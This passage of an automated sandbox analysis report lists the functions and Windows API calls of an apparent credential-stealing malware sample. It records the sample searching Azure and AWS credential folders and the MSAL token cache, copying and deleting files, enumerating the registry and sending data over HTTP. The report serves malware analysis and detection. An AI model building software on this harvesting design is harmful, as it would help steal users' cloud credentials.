                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                  • InternetCloseHandle.WININET(00000000), ref: 00405FC7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                                  • String ID: "$"$------$------$------
                                  • API String ID: 1406981993-2180234286
                                  • Opcode ID: 29c6a945f459f2f8c1075a72b727d682fe226b594e8a99ac19100750237bb99c
                                  • Instruction ID: 7b5b204680124ce1d4beb717fdfef1c68a0c63715f2d18b0248442adb904f056
                                  • Opcode Fuzzy Hash: 29c6a945f459f2f8c1075a72b727d682fe226b594e8a99ac19100750237bb99c
                                  • Instruction Fuzzy Hash: 20124071821118ABCB15FBA1DC95FEEB378BF14314F50419EB10A62091DF782B9ACF69
                                  Function 00414D70 Relevance: 35.1, APIs: 10, Strings: 10, Instructions: 119stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 00414D87
                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                  • lstrcatA.KERNEL32(?,00000000), ref: 00414DB0
                                  • lstrcatA.KERNEL32(?,\.azure\), ref: 00414DCD
                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                    • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                  • memset.MSVCRT ref: 00414E13
                                  • lstrcatA.KERNEL32(?,00000000), ref: 00414E3C
                                  • lstrcatA.KERNEL32(?,\.aws\), ref: 00414E59
                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                    • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                    • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                  • memset.MSVCRT ref: 00414E9F
                                  • lstrcatA.KERNEL32(?,00000000), ref: 00414EC8
                                  • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00414EE5
                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                    • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,0088C588,?,000003E8), ref: 00414A4A
                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                    • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                    • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                  • memset.MSVCRT ref: 00414F2B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache$zaA
                                  • API String ID: 4017274736-156832076
                                  • Opcode ID: c1a912e1918b28a31d7af5b1191f4ab077717743ad3d56635481e1ea4761ad81
                                  • Instruction ID: 18812f4626155d1e2a42465cb68794f5c6847905bec5d07e7ac1139e0e5490f3
                                  • Opcode Fuzzy Hash: c1a912e1918b28a31d7af5b1191f4ab077717743ad3d56635481e1ea4761ad81
                                  • Instruction Fuzzy Hash: 3141D6B9A4031467C710F7B0EC47FDD3738AB64704F404459B645660C2EEB897D98B9A
                                  Function 022ED157 Relevance: 31.9, APIs: 21, Instructions: 374stringmemoryfileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                    • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                    • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                    • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                    • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                    • Part of subcall function 022F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022F8DED
                                    • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                    • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022ED1EA
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 022ED32E
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 022ED335
                                  • lstrcat.KERNEL32(?,00000000), ref: 022ED46F
                                  • lstrcat.KERNEL32(?,00421478), ref: 022ED47E
                                  • lstrcat.KERNEL32(?,00000000), ref: 022ED491
                                  • lstrcat.KERNEL32(?,0042147C), ref: 022ED4A0
                                  • lstrcat.KERNEL32(?,00000000), ref: 022ED4B3
                                  • lstrcat.KERNEL32(?,00421480), ref: 022ED4C2
                                  • lstrcat.KERNEL32(?,00000000), ref: 022ED4D5
                                  • lstrcat.KERNEL32(?,00421484), ref: 022ED4E4
                                  • lstrcat.KERNEL32(?,00000000), ref: 022ED4F7
                                  • lstrcat.KERNEL32(?,00421488), ref: 022ED506
                                  • lstrcat.KERNEL32(?,00000000), ref: 022ED519
                                  • lstrcat.KERNEL32(?,0042148C), ref: 022ED528
                                  • lstrcat.KERNEL32(?,00000000), ref: 022ED53B
                                  • lstrcat.KERNEL32(?,00421490), ref: 022ED54A
                                    • Part of subcall function 022FAA87: lstrlen.KERNEL32(022E516C,?,?,022E516C,00420DDE), ref: 022FAA92
                                    • Part of subcall function 022FAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022FAAEC
                                  • lstrlen.KERNEL32(?), ref: 022ED591
                                  • lstrlen.KERNEL32(?), ref: 022ED5A0
                                  • memset.MSVCRT ref: 022ED5EF
                                    • Part of subcall function 022FACD7: StrCmpCA.SHLWAPI(0064A350,022EAA0E,?,022EAA0E,0064A350), ref: 022FACF6
                                  • DeleteFileA.KERNEL32(00000000), ref: 022ED61B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                  • String ID:
                                  • API String ID: 1973479514-0
                                  • Opcode ID: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                  • Instruction ID: 41b4746c9ffd5306fe0af26f11e432d7f1e46ce2f38ded2814f4f51be4619bb3
                                  • Opcode Fuzzy Hash: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                  • Instruction Fuzzy Hash: 8FE15175960308ABCB44FBE4DD95DEEB37ABF24301F504169F20AA6194DF34AA09CF61
                                  Function 0040CEF0 Relevance: 31.9, APIs: 21, Instructions: 374stringmemoryfileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,008855F0,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF83
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040D0C7
                                  • HeapAlloc.KERNEL32(00000000), ref: 0040D0CE
                                  • lstrcatA.KERNEL32(?,00000000,00883810,00421474,00883810,00421470,00000000), ref: 0040D208
                                  • lstrcatA.KERNEL32(?,00421478), ref: 0040D217
                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D22A
                                  • lstrcatA.KERNEL32(?,0042147C), ref: 0040D239
                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D24C
                                  • lstrcatA.KERNEL32(?,00421480), ref: 0040D25B
                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D26E
                                  • lstrcatA.KERNEL32(?,00421484), ref: 0040D27D
                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D290
                                  • lstrcatA.KERNEL32(?,00421488), ref: 0040D29F
                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D2B2
                                  • lstrcatA.KERNEL32(?,0042148C), ref: 0040D2C1
                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D2D4
                                  • lstrcatA.KERNEL32(?,00421490), ref: 0040D2E3
                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00883680,?,0042110C,?,00000000), ref: 0041A82B
                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                  • lstrlenA.KERNEL32(?), ref: 0040D32A
                                  • lstrlenA.KERNEL32(?), ref: 0040D339
                                  • memset.MSVCRT ref: 0040D388
                                    • Part of subcall function 0041AA70: StrCmpCA.SHLWAPI(00000000,00421470,0040D1A2,00421470,00000000), ref: 0041AA8F
                                  • DeleteFileA.KERNEL32(00000000), ref: 0040D3B4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTimememset
                                  • String ID:
                                  • API String ID: 2775534915-0
                                  • Opcode ID: a4f97debc43b6bb646af20662aa76c17e404fc0e6804846b70a1b628625fc9e7
                                  • Instruction ID: 94f9062ed3f4a6e26da847402fe0a382ec35b8ad99342330bde04fa79d6a5422
                                  • Opcode Fuzzy Hash: a4f97debc43b6bb646af20662aa76c17e404fc0e6804846b70a1b628625fc9e7
                                  • Instruction Fuzzy Hash: D2E17D75950108ABCB04FBE1DD96EEE7379BF14304F10405EF107B60A1DE38AA5ACB6A
                                  Function 022E5BC7 Relevance: 29.0, APIs: 19, Instructions: 493networkstringmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 022FAA07: lstrcpy.KERNEL32(?,00000000), ref: 022FAA4D
                                    • Part of subcall function 022E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A51
                                    • Part of subcall function 022E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A68
                                    • Part of subcall function 022E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A7F
                                    • Part of subcall function 022E4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022E4AA0
                                    • Part of subcall function 022E4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 022E4AB0
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 022E5C5F
                                  • StrCmpCA.SHLWAPI(?,0064A480), ref: 022E5C7A
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 022E5DFA
                                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00421A20,00000000,?,0064A0F0,00000000,?,0064A2F0,00000000,?,00421A1C), ref: 022E60D8
                                  • lstrlen.KERNEL32(00000000), ref: 022E60E9
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 022E60FA
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 022E6101
                                  • lstrlen.KERNEL32(00000000), ref: 022E6116
                                  • memcpy.MSVCRT(?,00000000,00000000), ref: 022E612D
                                  • lstrlen.KERNEL32(00000000), ref: 022E613F
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 022E6158
                                  • memcpy.MSVCRT(?), ref: 022E6165
                                  • lstrlen.KERNEL32(00000000,?,?), ref: 022E6182
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 022E6196
                                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 022E61B3
                                  • InternetCloseHandle.WININET(00000000), ref: 022E6217
                                  • InternetCloseHandle.WININET(00000000), ref: 022E6224
                                  • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 022E5E5F
                                    • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                    • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                    • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                    • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                    • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                    • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                  • InternetCloseHandle.WININET(00000000), ref: 022E622E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocateConnectCrackFileProcessReadSend
                                  • String ID:
                                  • API String ID: 1703137719-0
                                  • Opcode ID: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                  • Instruction ID: 296a0ab31cd51e8f10a314ce8ebea061593ea8a90364c4d2e63d94af6b265ca4
                                  • Opcode Fuzzy Hash: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                  • Instruction Fuzzy Hash: 8212DD71970318ABCB55EBE4DD95EEEF37ABF24700F4041A9A20A62194DF742B89CF50
                                  Function 022ECBF7 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 383filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                    • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                    • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                    • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                    • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                    • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                    • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0064A63C,00000000,?,0042144C,00000000,?,?), ref: 022ECCD3
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 022ECCF0
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 022ECCFC
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 022ECD0F
                                  • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 022ECD1C
                                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 022ECD40
                                  • StrStrA.SHLWAPI(?,0064A1B0,00420B52), ref: 022ECD5E
                                  • StrStrA.SHLWAPI(00000000,0064A364), ref: 022ECD85
                                  • StrStrA.SHLWAPI(?,0064A4D0,00000000,?,00421458,00000000,?,00000000,00000000,?,0064A15C,00000000,?,00421454,00000000,?), ref: 022ECF09
                                  • StrStrA.SHLWAPI(00000000,0064A4CC), ref: 022ECF20
                                    • Part of subcall function 022ECA87: memset.MSVCRT ref: 022ECABA
                                    • Part of subcall function 022ECA87: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 022ECAD8
                                    • Part of subcall function 022ECA87: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 022ECAE3
                                    • Part of subcall function 022ECA87: memcpy.MSVCRT(?,?,?), ref: 022ECB79
                                  • StrStrA.SHLWAPI(?,0064A4CC,00000000,?,0042145C,00000000,?,00000000,0064A0DC), ref: 022ECFC1
                                  • StrStrA.SHLWAPI(00000000,0064A5A8), ref: 022ECFD8
                                    • Part of subcall function 022ECA87: lstrcat.KERNEL32(?,00420B46), ref: 022ECBAA
                                    • Part of subcall function 022ECA87: lstrcat.KERNEL32(?,00420B47), ref: 022ECBBE
                                    • Part of subcall function 022ECA87: lstrcat.KERNEL32(?,00420B4E), ref: 022ECBDF
                                  • lstrlen.KERNEL32(00000000), ref: 022ED0AB
                                  • CloseHandle.KERNEL32(00000000), ref: 022ED103
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                  • String ID:
                                  • API String ID: 3555725114-3916222277
                                  • Opcode ID: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                  • Instruction ID: b8ee77e0d7826efe1f20cddda4f1c15a5f10c0ad021c5b414e0cc68e0edc059c
                                  • Opcode Fuzzy Hash: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                  • Instruction Fuzzy Hash: 84E1FF75920308ABCB54EFE4DD91EEEF77AAF14700F404169F20AA6195DF346A89CF50
                                  Function 0040C990 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 383filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0088A9F0,00000000,?,0042144C,00000000,?,?), ref: 0040CA6C
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040CA89
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0040CA95
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040CAA8
                                  • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 0040CAB5
                                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040CAD9
                                  • StrStrA.SHLWAPI(?,0088A798,00420B52), ref: 0040CAF7
                                  • StrStrA.SHLWAPI(00000000,0088AA68), ref: 0040CB1E
                                  • StrStrA.SHLWAPI(?,0088B328,00000000,?,00421458,00000000,?,00000000,00000000,?,00883760,00000000,?,00421454,00000000,?), ref: 0040CCA2
                                  • StrStrA.SHLWAPI(00000000,0088B0C8), ref: 0040CCB9
                                    • Part of subcall function 0040C820: memset.MSVCRT ref: 0040C853
                                    • Part of subcall function 0040C820: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,008836E0), ref: 0040C871
                                    • Part of subcall function 0040C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                    • Part of subcall function 0040C820: memcpy.MSVCRT(?,?,?), ref: 0040C912
                                  • StrStrA.SHLWAPI(?,0088B0C8,00000000,?,0042145C,00000000,?,00000000,008836E0), ref: 0040CD5A
                                  • StrStrA.SHLWAPI(00000000,00883590), ref: 0040CD71
                                    • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                    • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                    • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                  • lstrlenA.KERNEL32(00000000), ref: 0040CE44
                                  • CloseHandle.KERNEL32(00000000), ref: 0040CE9C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                  • String ID:
                                  • API String ID: 3555725114-3916222277
                                  • Opcode ID: ab42b5dea98dda6d1ec903180b661801f10a54a23581749008f7fe7b71c2160c
                                  • Instruction ID: fb2464dfdb87d028b9341c66972094ccea7bc9213c5b9a6eafc00a4a54def107
                                  • Opcode Fuzzy Hash: ab42b5dea98dda6d1ec903180b661801f10a54a23581749008f7fe7b71c2160c
                                  • Instruction Fuzzy Hash: 2FE13E71911108ABCB14FBA1DC91FEEB779AF14314F40416EF10673191EF386A9ACB6A
                                  Function 00418320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                  • RegOpenKeyExA.ADVAPI32(00000000,008870E8,00000000,00020019,00000000,004205B6), ref: 004183A4
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                                  • wsprintfA.USER32 ref: 00418459
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                                  • String ID: - $%s\%s$?
                                  • API String ID: 3246050789-3278919252
                                  • Opcode ID: be8ddf1fe9dc456048681201925a0f877c5bcd284375678f65f072a6cae44d7f
                                  • Instruction ID: f03ee3f6de4a678c4a24becac03c3675d5d4362b87af83515ad79f9b006405b7
                                  • Opcode Fuzzy Hash: be8ddf1fe9dc456048681201925a0f877c5bcd284375678f65f072a6cae44d7f
                                  • Instruction Fuzzy Hash: B4813E75911118ABEB24DF50CD81FEAB7B9FF08714F008299E109A6180DF756BC6CFA5
                                  Function 00410A60 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 205stringprocesssynchronizationCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                  • memset.MSVCRT ref: 00410C1C
                                  • lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                  • lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                  • lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                  • lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                  • lstrcatA.KERNEL32(?,00000000), ref: 00410C88
                                  • lstrcatA.KERNEL32(?,00420D84), ref: 00410C9A
                                  • lstrlenA.KERNEL32(?), ref: 00410CA7
                                  • memset.MSVCRT ref: 00410CCD
                                  • memset.MSVCRT ref: 00410CE1
                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00883680,?,0042110C,?,00000000), ref: 0041A82B
                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                    • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,008855F0,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
